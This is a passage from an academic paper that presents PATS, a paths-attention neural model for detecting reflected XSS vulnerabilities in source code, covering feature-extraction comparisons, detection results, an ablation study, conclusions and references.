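    return (path_ids + [pad_id] * k)[:k]
```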

4.4. Analysis of Semantic Feature Extraction Results

The semantic extraction model in this section follows the model proposed by Uri Alon in his work on distributed representations of code, which uses semantic feature vectors to predict function names for code snippets. Citing the comparative results between that model and others demonstrates the advantages of the chosen model for semantic extraction and justifies its selection. The Paths + CRFs feature extraction method was not re-implemented in this paper, so only the data from Uri Alon's work is cited; the comparison results are shown in Table 2. Zhen Li et al.'s deep-learning-based software vulnerability detection system avoids the graph-feature conversion required by graph neural network methods and reduces feature loss during training, and a single natural language processing method can achieve high accuracy and recall. However, its code-similarity-based detection makes it difficult to distinguish vulnerability features between similar code, so it is not included in the subsequent comparison. This experiment therefore compares only the mainstream attention-optimized CNN model and the attention-optimized LSTM model with the PATS model.
From the table, for sample data detection the paths-attention model achieves a precision of 63.3% and a recall of 56.2%, while the highest precision among the other models is only 47.3%.
We also emphasize the processing speed of the model: the proposed method can process 1000 samples per second, outperforming the other models, which means the paths-attention model handles XSS vulnerability code samples more efficiently. To better demonstrate this advantage, this section analyzes how training time affects the F-1 score of the different models, as shown in Figure 9.
From Figure 9, this model approaches convergence after about 30 h of training, and its F-1 score is much higher than those of the other three models, which require at least 72 h of training and still converge slowly even after that.
Based on the analysis of the experimental results mentioned above, the model used in this article is superior to other research in terms of accuracy and processing speed for semantic feature extraction of vulnerability source code samples, ensuring the quality of subsequent vulnerability detection results.

4.5. Analysis of XSS Vulnerability Detection Results

Currently, traditional model methods do not detect XSS vulnerabilities well. From the work of other scholars, N-gram [23], Tree-LSTM [24], and Siamese network [25] are three models with relatively good overall ability to detect XSS vulnerabilities, so they were set as control groups in this experiment. However, none of the three was specifically designed for reflected XSS vulnerabilities during its construction. To compare them objectively with the PATS model proposed in this paper, we adjusted the source code provided by their authors so that they could detect reflected XSS vulnerabilities. This also reflects another advantage of vulnerability detection models based on code semantics: they are not constrained by programming language. The final experiment used the parameters from Section 4.3 and a test set consisting of 25% of the total dataset. The following indicators were obtained: accuracy (ACC), true positive rate (TPR), false positive rate (FPR), and F-1 score, a comprehensive measure balancing precision and recall. The comparison results are shown in Table 3.
As concluded in the preceding theoretical analysis, the PATS model reaches an accuracy of 90.25% with a recall (TPR) of 74.51%, while the tree-structured LSTM reaches 83.02%. The results show that the PATS model has a clear advantage over the other models.
In addition to these evaluation criteria, the detection speed of these models was also compared. The comparison of model detection speeds is shown in Table 4.
It is worth noting that the training time in the table excludes the time for data representation conversion during processing, and only counts the time consumed by model training and testing for one iteration. Nevertheless, the PATS model still demonstrates significant advantages over other models in terms of comprehensive detection time and accuracy.
During the experiment, we compared the impact of different convolutional layers on model detection results, selected one to five fully connected layers, and compared direct connection with residual connection. The results are shown in Figure 10.
It can be seen intuitively that when the number of directly connected layers is greater than two, the accuracy begins to decline, while the residual connection starts to decline when it exceeds three. We compared the training and detection time of models with one-layer direct connection and three-layer residual connection, as shown in Figure 11.
From the figure, the training time of the model with three layers of residual connections is much longer than that of the model with one layer of direct connections. Reflected XSS vulnerability detection requires high timeliness: zero-day vulnerabilities, security flaws that are exploited as soon as they are discovered, mark the most harmful phase of a vulnerability's lifetime, so it is important to fix them before they are exploited. With advances in attack techniques, vulnerabilities that once took months to exploit can now be cracked and attacked within days, which poses a major challenge for vulnerability detection technology. After weighing timeliness against accuracy, this article ultimately chose a neural network with one layer of direct connections.

4.6. Ablation Experiment

When describing the model construction, an attention mechanism was introduced to improve the model's ability to extract code semantics, which brought a significant improvement. To quantify the specific impact of the attention mechanism on the experimental results, we conducted an ablation experiment in which the attention vector was removed, so that the output of the fully connected layers is passed directly to the aggregation vector, as shown in Figure 12.
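The ablated variant can be sketched as the attention-weighted aggregation with the weights replaced by a uniform average. The arrays are placeholders for learned values, and the function name is ours.

```python
import numpy as np

def aggregate(c_tilde, attn_vec=None):
    """Aggregate transformed context vectors into a single code vector.

    With attn_vec=None this mimics the ablation: every syntax path gets
    equal weight, so common, uninformative paths dilute the result.
    """
    n = len(c_tilde)
    if attn_vec is None:
        weights = np.full(n, 1.0 / n)         # ablated: uniform weights
    else:
        scores = c_tilde @ attn_vec
        e = np.exp(scores - scores.max())
        weights = e / e.sum()                 # attention weights, Formula (7)
    return (weights[:, None] * c_tilde).sum(axis=0)
```

In the ablated case the aggregate reduces to the plain mean of the path vectors, which is exactly why distinctive paths lose their influence.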
Quantitative analysis shows that after removing the attention mechanism, the model's recall and F-1 score both drop significantly. The main reason is that the model assigns equal weight to unimportant syntactic path groups, many of which come from common code; unable to discount the influence of that common code, the model's detection quality decreases. It is therefore evident that introducing an attention mechanism greatly improves this model.

5. Conclusions

This article proposes a detection method for reflected XSS vulnerabilities based on paths-attention. The method extracts semantic information and syntax features from code to obtain a vector representation, which is then used to detect reflected XSS vulnerabilities. First, by analyzing the principle of reflected XSS vulnerabilities and related research, we found that semantic extraction methods can be applied. Second, because a single semantic extraction model is inefficient and yields unclear results, an attention mechanism is introduced into the model structure: the original data are transformed into input variables and processed through fully connected layers, and the paper explains in detail what the attention mechanism is, why it is introduced, and how it is introduced. Combining semantic extraction with the attention mechanism and training on the dataset yields the PATS (paths-attention-based detection) model. The main contribution of this paper is proposing the PATS model at a time when no effective solution for reflected XSS vulnerabilities is available; PATS is shown to significantly improve detection accuracy and to exhibit excellent performance. In feature extraction experiments comparing PATS with other semantic extraction models, both precision and F-1 score improve by over 50%, and in XSS vulnerability detection experiments against other related models, PATS achieves an accuracy above 90% even at a much higher detection speed. The combination of semantic extraction and attention mechanisms in PATS outperforms traditional vulnerability detection models.
In practical applications, real-time monitoring can be achieved by installing detection software based on the PATS model and querying user traffic databases; since each piece of data undergoes code transformation and semantic extraction, privacy-related concerns are effectively avoided. However, the current combination of semantic extraction and attention mechanisms has only been tested on existing datasets of reflected XSS vulnerabilities; it does not achieve significant improvement for other types, such as DOM-based XSS vulnerabilities. In the future, we will work toward good detection results for more types of XSS vulnerabilities by increasing model capacity and computational resources and making appropriate adjustments to the structure.

Author Contributions

Conceptualization, Y.X. and X.T.; methodology, Y.X.; software, T.W.; validation, B.L., T.W. and X.T.; formal analysis, Y.X.; investigation, B.L.; resources, X.T.; data curation, T.W.; writing—original draft preparation, Y.X.; writing—review and editing, T.W. and X.T.; visualization, T.W.; supervision, B.L. and Y.X.; project administration, X.T.; funding acquisition, X.T. All authors have read and agreed to the published version of the manuscript.

Funding

This research was funded by the Basic Scientific Research Project of the Liaoning Provincial Department of Education (No. LJKZ0241).

Data Availability Statement

Data source has been declared at the dataset construction stage.

Acknowledgments

We thank those anonymous reviewers whose comments/suggestions helped improve and clarify this manuscript.

Conflicts of Interest

The authors declare no conflict of interest.

References

  1. Vieira, M.; Antunes, N. Defending against web application vulnerabilities. Computer 2012, 45, 66–72.
  2. Huang, J.; Guan, X.; Li, S. Software defect prediction model based on attention mechanism. In Proceedings of the 2021 International Conference on Computer Engineering and Application (ICCEA), Kunming, China, 25–27 June 2021; IEEE: Piscataway, NJ, USA, 2021; pp. 338–345.
  3. Ni, P.; Chen, W. Detection of Reflected Cross-Site Scripting Vulnerabilities Based on Fuzzy Testing. J. Comput. Appl. 2021, 41, 2594.
  4. Wang, X.; Chen, J.; Gu, Y. Generalized graph signal sampling and reconstruction. In Proceedings of the 2015 IEEE Global Conference on Signal and Information Processing (GlobalSIP), Orlando, FL, USA, 14–16 December 2015; pp. 567–571.
  5. Kirda, E.; Jovanovic, N.; Kruegel, C. Client-side cross-site scripting protection. Comput. Secur. 2009, 28, 592–604.
  6. Qin, Y. Key Technology Research and Implementation of Stored Cross-Site Scripting Vulnerabilities. Ph.D. Thesis, Beijing University of Technology, Beijing, China, 2019.
  7. Zhang, W. Research and Improvement of White Box Fuzz Testing Technology. Ph.D. Thesis, Nanjing University of Posts and Telecommunications, Nanjing, China, 2019.
  8. Simos, D.E.; Garn, B.; Zivanovic, J.; Leithner, M. Practical combinatorial testing for XSS detection using locally optimized attack models. In Proceedings of the 2019 IEEE International Conference on Software Testing, Verification and Validation Workshops (ICSTW), Xi’an, China, 22–23 April 2019; pp. 122–130.
  9. Liu, M.; Zhang, B.; Chen, W.; Zhang, X. A survey of exploitation and detection methods of XSS vulnerabilities. IEEE Access 2019, 7, 182004–182016.
  10. Allamanis, M.; Tarlow, D.; Gordon, A.; Wei, Y. Bimodal modelling of source code and natural language. In Proceedings of the International Conference on Machine Learning, Lille, France, 6–11 July 2015; pp. 2123–2132.
  11. Gamez-Diaz, A.; Fernandez, P.; Ruiz-Cortes, A. An analysis of RESTful APIs offerings in the industry. In Proceedings of the Service-Oriented Computing: 15th International Conference, ICSOC 2017, Malaga, Spain, 13–16 November 2017; Springer: Berlin/Heidelberg, Germany; pp. 589–604.
  12. Gu, M.; Wang, D.; Zhao, W.; Fu, L. A Penetration Testing Method for XSS Vulnerabilities Based on Attack Vector Generation. Softw. Guide 2016, 15, 173–177.
  13. Sivanesan, A.P.; Mathur, A.; Javaid, A.Y. A google chromium browser extension for detecting XSS attack in html5 based websites. In Proceedings of the 2018 IEEE International Conference on Electro/Information Technology (EIT), Rochester, MI, USA, 3–5 May 2018; IEEE: Piscataway, NJ, USA, 2018; pp. 302–304.
  14. Liu, Z.; Fang, Y.; Huang, C.; Han, J. GraphXSS: An efficient XSS payload detection approach based on graph convolutional network. Comput. Secur. 2022, 114, 102597.
  15. Software Assurance Reference Dataset from the National Institute of Standards and Technology (NIST). 2018. Available online: https://www.nist.gov/itl/ssd/software-quality-group/samate/software-assurance-reference-dataset-sard (accessed on 1 May 2021).
  16. Yang, L.; Wu, Y.; Wang, J.; Liu, Y. A Review of Research on Recurrent Neural Networks. Comput. Appl. 2018, 38, 1–6+26.
  17. Iyer, S.; Konstas, I.; Cheung, A.; Zettlemoyer, L. Summarizing source code using a neural attention model. In Proceedings of the 54th Annual Meeting of the Association for Computational Linguistics, Berlin, Germany, 7–12 August 2016; Volume 1, pp. 2073–2083.
  18. Bielik, P.; Raychev, V.; Vechev, M. PHOG: Probabilistic model for code. In Proceedings of the International Conference on Machine Learning, New York, NY, USA, 19–24 June 2016; pp. 2933–2942.
  19. Alon, U.; Zilberstein, M.; Levy, O.; Yahav, E. code2vec: Learning distributed representations of code. Proc. ACM Program. Lang. 2019, 3, 1–29.
  20. Tsukamoto, S.; Sakai, S.; Irie, H. Detection of Reflected XSS Using Dynamic Information Flow Tracking. Res. Rep. Syst. Archit. ARC 2019, 2019, 1–6.
  21. Mishne, A.; Shoham, S.; Yahav, E. Typestate-based semantic code search over partial programs. In Proceedings of the ACM International Conference on Object Oriented Programming Systems Languages and Applications, Tucson, AZ, USA, 19–26 October 2012.
  22. Sun, H.; Cui, L.; Li, L.; Ding, Z.; Hao, Z.; Cui, J.; Liu, P. VDSimilar: Vulnerability detection based on code similarity of vulnerabilities and patches. Comput. Secur. 2021, 110, 102417.
  23. Li, Q.; Wang, R.; Jia, X. Cross-site scripting detection method based on classifier and improved n-gram model in OSN. Comput. Appl. 2014, 34, 1661–1665.
  24. Dam, H.K.; Pham, T.; Ng, S.W.; Tran, T.; Grundy, J.; Ghose, A.; Kim, T.; Kim, C.-J. Lessons learned from using a deep tree-based model for software defect prediction in practice. In Proceedings of the 2019 IEEE/ACM 16th International Conference on Mining Software Repositories (MSR), Montreal, QC, Canada, 25–31 May 2019; IEEE: Piscataway, NJ, USA, 2019.
  25. Cui, L.; Hao, Z.; Jiao, Y.; Fei, H.; Yun, X. Vuldetector: Detecting vulnerabilities using weighted feature graph comparison. IEEE Trans. Inf. Forensics Secur. 2020, 16, 2004–2017.
Figure 1. Flowchart of the paths-attention algorithm model.
Figure 2. The detection model process of tree LSTM.
Figure 3. Siamese network detection model process.
Figure 4. Semantic analysis of similar code.
Figure 5. Model architecture diagram with attention mechanism.
Figure 6. Snippet of code.
Figure 7. AST syntax paths and attention weights.
Figure 8. Sample labels and vulnerability characteristics.
Figure 9. Effect of training time and F-1 score.
Figure 10. Comparison results of the two connection modes.
Figure 11. Time-based comparison of the two connections.
Figure 12. Comparison of ablation results.
Table 1. Ratio of positive and negative samples in dataset.

| Source | Positive Sample | Negative Sample | Sample Ratio |
|---|---|---|---|
| Promise database | 132,943 | 70 | 0.05265% |
| GitHub open-source projects | 478,000 | 2326 | 0.4866% |

Table 2. Comparison of model results in references.

| Model | Precision | Recall | F1 | Prediction Rate |
|---|---|---|---|---|
| CNN + Attention | 47.3 | 29.4 | 33.9 | 0.1 |
| LSTM + Attention [22] | 27.5 | 21.5 | 24.1 | 5 |
| Paths + CRFs | - | - | - | 10 |
| Paths-Attention (this model) | 63.3 | 56.2 | 59.5 | 1000 |

Table 3. Evaluation of test results.

| Model | ACC | TPR | FPR | F-1 |
|---|---|---|---|---|
| N-gram | 0.6154 | 0.1085 | 0.0427 | 0.1844 |
| Tree-LSTM | 0.8302 | 0.5896 | 0.0690 | 0.6993 |
| Siamese Network | 0.8117 | 0.6528 | 0.0613 | 0.7237 |
| Paths-Attention (this model) | 0.9025 | 0.7451 | 0.0836 | 0.8162 |

Table 4. Model detection speed.

| Model | Training Time/s | Test Time/s | Number of Vulnerabilities | Rate of Speed/s |
|---|---|---|---|---|
| N-gram | 1762.7 | 254 | 117 | 6.51 |
| Tree-LSTM | 4141.7 | 287 | 161 | 7.09 |
| Siamese Network | 2923.3 | 331 | 155 | 5.95 |
| Paths-Attention (this model) | 2987.0 | 343 | 176 | 57.51 |
Tan, X.; Xu, Y.; Wu, T.; Li, B. Detection of Reflected XSS Vulnerabilities Based on Paths-Attention Method. Appl. Sci. 2023, 13, 7895. https://doi.org/10.3390/app13137895
